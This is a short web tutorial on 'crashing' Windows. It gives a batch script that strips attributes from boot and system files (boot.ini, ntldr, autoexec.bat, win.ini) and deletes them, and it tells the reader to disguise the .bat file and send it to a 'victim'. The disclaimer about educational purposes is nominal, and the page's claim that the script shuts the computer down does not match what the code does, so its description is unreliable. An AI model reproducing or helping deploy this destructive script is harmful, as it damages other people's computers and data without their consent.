How To Crash Windows ?

Warning :- This guide is for educational purposes only, and we are not responsible for any misuse.

Crash Windows

Open a new notepad then copy and paste the codes inside it.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now save the file with a name so that the victim cannot prevent themselves from opening/running it.

Example: FileName.bat

Now you need to send the file to the victim’s PC/laptop.

Also Read  How To Make An Invisible Folder ?

once the victim opens the file, you’re done.

This should shut down the person’s computer.

It shut down the device once and removes all the files needed for reboot and restart.

Warning :- Don’t open/run the file on your device.